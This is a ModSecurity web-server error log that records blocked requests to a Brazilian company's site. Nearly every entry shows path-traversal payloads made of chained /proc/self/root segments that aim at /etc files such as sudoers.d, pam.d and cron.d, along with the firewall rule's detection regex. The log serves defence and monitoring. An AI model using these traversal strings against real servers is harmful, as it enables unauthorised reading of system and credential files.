[hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg1tSswJuvopo3lOh0QwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:17.139263 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:45428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg2dSswJuvopo3lOh0RQAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:21.316555 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:58980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg3Y6lpbStxTqkSkt_fwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:26.048158 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:58990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg4tSswJuvopo3lOh0TAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:27.365223 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:59006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg446lpbStxTqkSkt_gQAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:28.617252 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:48356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg5KTCbgAP5jq5TehBpQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:29.938037 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:48366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg5Ur9dMAiw-8KANNciAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:31.137313 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:48368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg50r9dMAiw-8KANNciQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:37.095568 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.241.46:48374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg7Ur9dMAiw-8KANNcjwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:40.197635 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:60224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg8FajLEzk2WiQ-10n5gAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:58:44.989711 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:60234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhg9P9ocpUE4ed4uDwHgAAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:07.336150 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:60238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhC7ABkC4fWIHEf8EI0wAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:59:24.530529 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:53864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhHLABkC4fWIHEf8EI-QAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:27.016431 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:55338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhH_9ocpUE4ed4uDwHkwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:28.439409 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:52502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhIP9ocpUE4ed4uDwHlAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:37.018437 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:52512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhKbABkC4fWIHEf8EJEAAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:42.763152 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:59546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhLrABkC4fWIHEf8EJGwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:46.513334 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:59552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhMkr9dMAiw-8KANNcoQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:59:46.867373 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.244.31:37896] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhhMrABkC4fWIHEf8EJIQAAAFg"]
[Mon Mar 16 17:00:31.124445 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:59560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhX7ABkC4fWIHEf8EJXAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:00:33.723789 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:53202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhYdSswJuvopo3lOh0ZQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:00:40.931203 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:53208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhaP9ocpUE4ed4uDwHuwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:42.343021 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:55758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhaqTCbgAP5jq5TehB3AAAAtg"], referer: 